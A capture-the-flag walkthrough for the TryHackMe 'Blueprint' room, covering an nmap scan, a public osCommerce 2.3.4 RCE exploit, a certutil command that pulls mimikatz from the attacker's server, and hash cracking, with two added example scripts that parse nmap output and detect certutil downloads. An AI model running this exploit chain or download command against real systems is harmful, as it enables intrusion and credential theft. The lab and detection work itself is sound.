Blueprint|TryHackMe


Start by scanning the ports with nmap:

┌──(root㉿shangchen)-[~/Desktop]
└─# nmap -sV 10.10.75.95
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 16:14 CST
Nmap scan report for 10.10.75.95
Host is up (0.30s latency).
Not shown: 987 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: www.example.com, BLUEPRINT, localhost; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.82 seconds
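Thirteen open ports is enough that it pays to structure the output rather than eyeball it. The snippet below is an added example (not part of the original writeup) that parses the port table of `nmap -sV` normal output into records, lists the HTTP ports to review, and groups ports by version string so that the same Apache/PHP build on 443 and 8080 is recognised as one patching decision. The embedded text is the scan above, copied in as sample input; the regex assumes nmap's default `PORT STATE SERVICE VERSION` column layout.

```python
import re
from collections import defaultdict

# Sample input: the -sV port table from the scan above (copied, not re-run).
NMAP_OUTPUT = """\
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql MariaDB (unauthorized)
8080/tcp open http Apache httpd 2.4.23 (OpenSSL/1.0.2h PHP/5.6.28)
49152/tcp open msrpc Microsoft Windows RPC
"""

# port/proto, state, service name, then everything left over is the version banner.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap_ports(text):
    """Turn nmap normal-output port lines into dicts; non-port lines are skipped."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # header, "Not shown", "Service Info" etc.
        port, proto, state, service, version = m.groups()
        ports.append({
            "port": int(port),
            "proto": proto,
            "state": state,
            "service": service,
            "version": version.strip(),
        })
    return ports


def web_ports(ports):
    """Ports nmap labels http or ssl/http: where the web application review starts."""
    return sorted(p["port"] for p in ports if p["service"].split("/")[-1] == "http")


def versions_by_product(ports):
    """Group ports by version banner so one outdated build on several ports is seen once."""
    grouped = defaultdict(list)
    for p in ports:
        if p["version"]:
            grouped[p["version"]].append(p["port"])
    return dict(grouped)


if __name__ == "__main__":
    parsed = parse_nmap_ports(NMAP_OUTPUT)
    print("web ports:", web_ports(parsed))
    for banner, plist in versions_by_product(parsed).items():
        print(f"{banner}: {plist}")
```

On this host the grouping shows the same Apache 2.4.23 / PHP 5.6.28 stack on both 443 and 8080, which is the exposure the rest of the writeup exploits.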

Ports 80, 443 and 8080 are all open. Browsing each one, only 8080 serves anything of interest: osCommerce 2.3.4.

There is a known RCE for that version, so let's try it:

$ git clone https://github.com/whokilleddb/osCommerce-2.3.4-RCE-exploit
$ cd osCommerce-2.3.4-RCE-exploit
$ cargo build --release

$ oscommerece_exploit -u http://127.0.0.1/oscommerce-2.3.4/catalog/

It works, but this is not a persistent shell: each command runs in a fresh context, so after `cd` the next command still executes in the original directory.

So just start with `dir` from `C:\` and work down. root.txt is on the Desktop, absurdly named root.txt.txt.

The next task is the password hash of the Lab user. Couldn't get it this way, so let's switch to another exploit:

searchsploit oscommerce

Start an HTTP server on the attacking side and pull the file onto the target:

certutil -urlcache -split -f http://10.9.224.253:8888/share/mimikatz.exe mimikatz32.exe
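That `certutil -urlcache -split -f <url>` command is exactly the LOLBin download pattern a SOC should alert on, and here it was spawned by the web server through the osCommerce RCE. Below is an added detection example (not part of the writeup) that runs over constructed process-creation events with Sysmon-style `Image` / `CommandLine` / `ParentImage` fields. The first event reuses the command from this page; the other two are constructed benign certutil uses that must not match. Field names and the parent-process list are assumptions for the example.

```python
import re

# Constructed sample events (Sysmon Event ID 1 style fields; made up for this example).
# Event 0 reuses the download command from the writeup, run via the web app RCE.
EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://10.9.224.253:8888/share/mimikatz.exe mimikatz32.exe",
     "ParentImage": r"C:\xampp\apache\bin\httpd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -verify -urlfetch server.cer",      # legitimate: chain/CRL check
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -hashfile C:\\Users\\lab\\setup.msi SHA256",  # legitimate: hashing
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]

URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# Parents that should never be launching certutil; assumed list for this example.
WEB_SERVER_PARENTS = {"httpd.exe", "w3wp.exe", "php-cgi.exe", "nginx.exe"}


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def certutil_download_indicators(event):
    """Return the reasons an event looks like certutil used as a downloader ([] = clean)."""
    reasons = []
    if _basename(event["Image"]) != "certutil.exe":
        return reasons
    args = event["CommandLine"].split()[1:]
    # certutil accepts -flag and /flag; normalise both to the bare word.
    flags = {a.lower().lstrip("-/") for a in args if a.startswith(("-", "/"))}
    has_url = any(URL_RE.match(a) for a in args)
    if "urlcache" in flags and has_url:
        reasons.append("certutil -urlcache with a remote URL (LOLBin file download)")
    if "split" in flags and has_url:
        reasons.append("-split writes the fetched body to a local file")
    parent = _basename(event["ParentImage"])
    if reasons and parent in WEB_SERVER_PARENTS:
        reasons.append(f"spawned by web server process {parent} (webshell/RCE pattern)")
    return reasons


def flag_certutil_downloads(events):
    """Return [(index, reasons)] for every event that matches the downloader pattern."""
    hits = []
    for i, ev in enumerate(events):
        reasons = certutil_download_indicators(ev)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for idx, why in flag_certutil_downloads(EVENTS):
        print(f"event {idx}: {EVENTS[idx]['CommandLine']}")
        for r in why:
            print("   -", r)
```

Requiring both the `-urlcache` flag and a URL argument keeps the rule from firing on `-verify -urlfetch` and `-hashfile`, while the web-server parent check turns a medium-confidence LOLBin alert into a strong one.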

I think I see what was going on... the system is 32-bit and I had been pushing the 64-bit build the whole time. Hilarious.

hashes.com cracks the hash to `googleplus`.

Next time, check the architecture first.

Let's also try the msfvenom route. First generate the payload:

Start a listener in msfconsole:

Upload and execute shell.exe:

On the other side, msfconsole receives the shell:

`hashdump` gives the hash; crack it and that's it.